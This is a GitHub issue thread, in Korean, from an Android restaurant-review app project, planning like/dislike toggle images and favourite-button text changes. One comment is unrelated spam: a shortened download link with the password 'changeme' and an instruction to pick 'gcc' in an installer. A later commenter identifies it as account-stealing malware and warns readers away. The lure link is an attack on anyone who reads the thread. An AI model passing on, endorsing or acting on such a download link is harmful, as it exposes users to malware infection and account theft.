### ISSUE TITLE
상세 리뷰 토글 및 버튼 클릭 UI 추가

### ISSUE THREAD

**Issue by imtaejugkim** [kustaurant/Android#40]
### 구현하려는 기능
- 좋아요/싫어요 눌렀을 때 회색, 안눌렀을 때 회색 표시
- 즐겨찾기 추가 시 텍스트 변동

### 해당 기능 구현을 위해 할 일
- 클릭에 따른 이미지 업데이트
- 클릭에 따른 텍스트 업데이트

### 예상 작업 시간
- 1시간 내외

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.
